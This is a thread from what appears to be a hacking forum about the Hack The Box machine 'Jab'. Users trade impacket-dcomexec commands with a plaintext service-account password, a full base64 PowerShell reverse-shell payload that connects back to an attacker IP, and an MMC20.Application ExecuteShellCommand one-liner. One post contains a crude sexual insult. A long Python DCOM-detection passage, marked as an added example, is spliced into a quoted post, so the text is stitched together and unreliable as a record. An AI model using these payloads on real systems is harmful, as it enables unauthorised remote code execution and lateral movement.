HTB - Jab
by paven - Saturday February 24, 2024 at 04:18 PM
#31
Who got the dcomexec to work? I've been trying to use impacket's tool but so far no luck. Trying to execute a command as svc_openfire, but its not happening.

#32
(Feb 25, 2024, 04:36 AM)fatgirl Wrote:
(Feb 25, 2024, 04:25 AM)andlommy Wrote:
(Feb 25, 2024, 04:23 AM)fl00d777 Wrote: Who got the dcomexec to work? I've been trying to use impacket's tool but so far no luck. Trying to execute a command as svc_openfire, but its not happening.

just runas /user:svc_openfire /netonly cmd
then run the dcomexec
can't run it from linux, though, as linux doesn't know what dcom is and RPC is...ugh...like fatgirl's tits...ugly
you're ugly. and bad at computers because this works on linux.

```
impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.10.xx.xx 'powershell -e ibetthiswaspartofit'
```

RIP. You will be missed. I'll keep the 'za warm for your return.
#33
Sorry to bother you again with this stupid question, but how can I extract the list from Pidgin?

#34
(Feb 25, 2024, 04:44 AM)andlommy Wrote:
(Feb 25, 2024, 04:36 AM)fatgirl Wrote:
(Feb 25, 2024, 04:25 AM)andlommy Wrote:
(Feb 25, 2024, 04:23 AM)fl00d777 Wrote: Who got the dcomexec to work? I've been trying to use impacket's tool but so far no luck. Trying to execute a command as svc_openfire, but its not happening.

just runas /user:svc_openfire /netonly cmd
then run the dcomexec
can't run it from linux, though, as linux doesn't know what dcom is and RPC is...ugh...like fatgirl's tits...ugly
you're ugly. and bad at computers because this works on linux.

```
impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.10.xx.xx 'powershell -e blbhalbhalbhalbalhbalhbal'
```

nah, doesn't work, or is unreliable. windows one works instantly

we'll miss you for 1 day 23 hours and 56 minutes :(

How to conduct in Windows ??? help

Using impacket dcomexec failed:
```
$ impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@$IP
Impacket v0.11.0 - Copyright 2023 Fortra

[*]SMBv3.0 dialect used
```
but nothing else
#35
(Feb 25, 2024, 07:05 AM)eclipse Wrote:
(Feb 25, 2024, 04:44 AM)andlommy Wrote:
(Feb 25, 2024, 04:36 AM)fatgirl Wrote:
(Feb 25, 2024, 04:25 AM)andlommy Wrote:
(Feb 25, 2024, 04:23 AM)fl00d777 Wrote: Who got the dcomexec to work? I've been trying to use impacket's tool but so far no luck. Trying to execute a command as svc_openfire, but its not happening.

just runas /user:svc_openfire /netonly cmd
then run the dcomexec
can't run it from linux, though, as linux doesn't know what dcom is and RPC is...ugh...like fatgirl's tits...ugly
you're ugly. and bad at computers because this works on linux.

```
impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.10.xx.xx 'powershell -e blbhalbhalbhalbalhbalhbal'
```

nah, doesn't work, or is unreliable. windows one works instantly

we'll miss you for 1 day 23 hours and 56 minutes :(

How to conduct in Windows ??? help

Using impacket dcomexec failed:
```
$ impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@$IP
Impacket v0.11.0 - Copyright 2023 Fortra

[*]SMBv3.0 dialect used
```
but nothing else

You need cmd.exe /c powershell -e <payload> after the IP

Use revshells.com and PowerShell #3 (Base64)
#36
(Feb 25, 2024, 07:13 AM)wardensec Wrote:
(Feb 25, 2024, 07:05 AM)eclipse Wrote:
(Feb 25, 2024, 04:44 AM)andlommy Wrote:
(Feb 25, 2024, 04:36 AM)fatgirl Wrote:
(Feb 25, 2024, 04:25 AM)andlommy Wrote: just runas /user:svc_openfire /netonly cmd
then run the dcomexec
can't run it from linux, though, as linux doesn't know what dcom is and RPC is...ugh...like fatgirl's tits...ugly
you're ugly. and bad at computers because this works on linux.

```
impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@10.10.xx.xx 'powershell -e blbhalbhalbhalbalhbalhbal'
```

nah, doesn't work, or is unreliable. windows one works instantly

we'll miss you for 1 day 23 hours and 56 minutes :(

How to conduct in Windows ??? help

Using impacket dcomexec failed:
```
$ impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@$IP
Impacket v0.11.0 - Copyright 2023 Fortra

[*]SMBv3.0 dialect used
```
but nothing else

You need cmd.exe /c powershell -e <payload> after the IP

Use revshells.com and PowerShell #3 (Base64)

```
$ python dcomexec.py -object MMC20 -dc-ip $IP -debug jab.htb/'svc_openfire':'!@#$%^&*(1qazxsw'@$IP 'cmd.exe /c powershell -e <payload>'
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*]SMBv3.0 dialect used
[+] Target system is 10.129.225.190 and isFQDN is False
[+] StringBinding: DC01[59636]
[+] StringBinding: 10.129.225.190[59636]
[+] StringBinding chosen: ncacn_ip_tcp:10.129.225.190[59636]
```
still cannot get a revshell ; ;
#37
(Feb 25, 2024, 08:02 AM)Th35t0rm Wrote:
(Feb 25, 2024, 07:48 AM)eclipse Wrote:
(Feb 25, 2024, 07:13 AM)wardensec Wrote:
(Feb 25, 2024, 07:05 AM)eclipse Wrote:
(Feb 25, 2024, 04:44 AM)andlommy Wrote: nah, doesn't work, or is unreliable. windows one works instantly

we'll miss you for 1 day 23 hours and 56 minutes :(

How to conduct in Windows ??? help

Using impacket dcomexec failed:
```
$ impacket-dcomexec -object MMC20 jab.htb/svc_openfire:'!@#$%^&*(1qazxsw'@$IP
Impacket v0.11.0 - Copyright 2023 Fortra

[*]SMBv3.0 dialect used
```
but nothing else

You need cmd.exe /c powershell -e <payload> after the IP

Use revshells.com and PowerShell #3 (Base64)

```
$ python dcomexec.py -object MMC20 -dc-ip $IP -debug jab.htb/'svc_openfire':'!@#$%^&*(1qazxsw'@$IP 'cmd.exe /c powershell -e <payload>'
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*]SMBv3.0 dialect used
[+] Target system is 10.129.225.190 and isFQDN is False
[+] StringBinding: DC01[59636]
[+] StringBinding: 10.129.225.190[59636]
[+] StringBinding chosen: ncacn_ip_tcp:10.129.225.190[59636]
```
still cannot get a revshell ; ;

I had the same issue, so I switched to a Windows machine

How did you do it from Windows? Using DCOM-Invoke.ps1?
#38
(Feb 25, 2024, 08:41 AM)Th35t0rm Wrote:
(Feb 25, 2024, 08:24 AM)a44857437 Wrote:
(Feb 25, 2024, 08:02 AM)Th35t0rm Wrote:
(Feb 25, 2024, 07:48 AM)eclipse Wrote:
(Feb 25, 2024, 07:13 AM)wardensec Wrote: You need cmd.exe /c powershell -e <payload> after the IP

Use revshells.com and PowerShell #3 (Base64)

```
$ python dcomexec.py -object MMC20 -dc-ip $IP -debug jab.htb/'svc_openfire':'!@#$%^&*(1qazxsw'@$IP 'cmd.exe /c powershell -e <payload>'
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*]SMBv3.0 dialect used
[+] Target system is 10.129.225.190 and isFQDN is False
[+] StringBinding: DC01[59636]
[+] StringBinding: 10.129.225.190[59636]
[+] StringBinding chosen: ncacn_ip_tcp:10.129.225.190[59636]
```
still cannot get a revshell ; ;

I had the same issue, so I switched to a Windows machine

How did you do it from Windows? Using DCOM-Invoke.ps1?

runas /user:jab.htb\svc_openfire /netonly powershell
then
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.10.X.X"))
https://book.hacktricks.xyz/windows-hard.../dcom-exec

stupid question, but how do I get the initial shell to run the runas?
#39
(Feb 25, 2024, 08:41 AM)Th35t0rm Wrote:
(Feb 25, 2024, 08:24 AM)a44857437 Wrote:
(Feb 25, 2024, 08:02 AM)Th35t0rm Wrote:
(Feb 25, 2024, 07:48 AM)eclipse Wrote:
(Feb 25, 2024, 07:13 AM)wardensec Wrote: You need cmd.exe /c powershell -e <payload> after the IP

Use revshells.com and PowerShell #3 (Base64)

```
$ python dcomexec.py -object MMC20 -dc-ip $IP -debug jab.htb/'svc_openfire':'!@#$%^&*(1qazxsw'@$IP 'cmd.exe /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANQAiACwAMQAyADMANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA='
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*]SMBv3.0 dialect used
[+] Target system is 10.129.225.190 and isFQDN is False
[+] StringBinding: DC01[59636]
[+] StringBinding: 10.129.225.190[59636]
[+] StringBinding chosen: ncacn_ip_tcp:10.129.225.190[59636]
```
still cannot get a revshell ; ;

I had the same issue, so I switched to a Windows machine

How did you do it from Windows? Using DCOM-Invoke.ps1?

runas /user:jab.htb\svc_openfire /netonly powershell
then
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.10.X.X"))
https://book.hacktricks.xyz/windows-hard.../dcom-exec

Thanks! This one worked for me:
```
[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","10.129.X.X")).Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c ping 10.10.X.X","7")
```
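A defender's counterpart to the MMC20.Application technique the posts above are trading, added here as an example and not code from the thread or from any project it mentions. When ExecuteShellCommand is used over DCOM, the target host runs mmc.exe started by the DCOM launcher (svchost.exe -k DcomLaunch, with mmc.exe -Embedding on the command line), and that mmc.exe then spawns cmd.exe or powershell.exe; the thread's Linux-side failures and Windows-side successes all leave that same parent/child chain on the host. The Python below flags the chain in Sysmon-style process-creation records and decodes any PowerShell -e / -EncodedCommand argument (base64 over UTF-16LE) so an analyst can read what was run. The log records are constructed, the field names follow Sysmon Event ID 1 (an assumption about the log source), and the encoded command is a harmless Write-Output built at runtime.

```python
"""Triage helper for DCOM lateral movement via MMC20.Application (added example)."""
import base64
import json
import re
from typing import List, Optional

RULE_DCOM_MMC = "mmc.exe started by the DCOM launcher (consistent with MMC20.Application activation)"
RULE_MMC_CHILD = "shell spawned by mmc.exe (consistent with ExecuteShellCommand)"
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -e/-enc/-EncodedCommand argument, or None.

    PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...);
    the value is base64 over UTF-16LE.  Malformed values yield None instead of raising.
    """
    tokens = re.split(r"\s+", command_line.strip())
    for i, tok in enumerate(tokens[:-1]):
        if not tok.startswith(("-", "/")):
            continue
        flag = tok.lstrip("-/").lower()
        if flag and "encodedcommand".startswith(flag):
            try:
                raw = base64.b64decode(tokens[i + 1].strip("'\""), validate=True)
                return raw.decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def basename(path: str) -> str:
    """Lower-cased final path component, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(records: List[dict]) -> List[dict]:
    """Apply both rules to Sysmon-style process-creation dicts; return the findings."""
    findings = []
    for rec in records:
        if rec.get("EventID") != 1:
            continue
        image = basename(rec.get("Image", ""))
        parent = basename(rec.get("ParentImage", ""))
        parent_cmd = rec.get("ParentCommandLine", "").lower()
        cmd = rec.get("CommandLine", "")
        rule = None
        # Rule 1: DCOM-activated mmc.exe (parent is the DcomLaunch svchost).
        if image == "mmc.exe" and parent == "svchost.exe" and "dcomlaunch" in parent_cmd:
            rule = RULE_DCOM_MMC
        # Rule 2: a shell whose parent is mmc.exe (ExecuteShellCommand's child).
        elif image in SHELLS and parent == "mmc.exe":
            rule = RULE_MMC_CHILD
        if rule:
            findings.append({
                "pid": rec.get("ProcessId"),
                "user": rec.get("User"),
                "rule": rule,
                "command_line": cmd,
                "decoded_command": decode_encoded_command(cmd),
            })
    return findings


# Constructed sample records (not captured from any host).  The encoded command is
# built here so the base64 is guaranteed to match the plaintext.
ENCODED_HELLO = base64.b64encode("Write-Output 'hello'".encode("utf-16-le")).decode("ascii")
SAMPLE_RECORDS = [
    {"EventID": 1, "ProcessId": 4120, "ParentProcessId": 888, "User": "JAB\\svc_openfire",
     "Image": "C:\\Windows\\System32\\mmc.exe",
     "CommandLine": "C:\\Windows\\system32\\mmc.exe -Embedding",
     "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "ParentCommandLine": "C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p"},
    {"EventID": 1, "ProcessId": 5004, "ParentProcessId": 4120, "User": "JAB\\svc_openfire",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": f"cmd.exe /c powershell -e {ENCODED_HELLO}",
     "ParentImage": "C:\\Windows\\System32\\mmc.exe",
     "ParentCommandLine": "C:\\Windows\\system32\\mmc.exe -Embedding"},
    # Benign: an admin opening Event Viewer from the desktop, which must not fire.
    {"EventID": 1, "ProcessId": 6100, "ParentProcessId": 2200, "User": "JAB\\admin",
     "Image": "C:\\Windows\\System32\\mmc.exe",
     "CommandLine": "\"C:\\Windows\\system32\\mmc.exe\" \"C:\\Windows\\system32\\eventvwr.msc\"",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "ParentCommandLine": "C:\\Windows\\Explorer.EXE"},
]

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_RECORDS), indent=2))
```

Rule 1 alone catches the DCOM activation even when the attacker's command never starts (the Linux-side attempts in the thread that hang after the StringBinding lines would still leave the mmc.exe start, if the call got that far); rule 2 is what distinguishes a successful ExecuteShellCommand from someone merely opening a console. On a real host the same records come from Sysmon Event ID 1 or Windows Security 4688 with command-line auditing enabled, and the 4624 network logon for the activating account precedes both.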
#40
Hint for root: look for an exploit for a patched CVE. It doesn't work, but understanding it will put you in the right direction.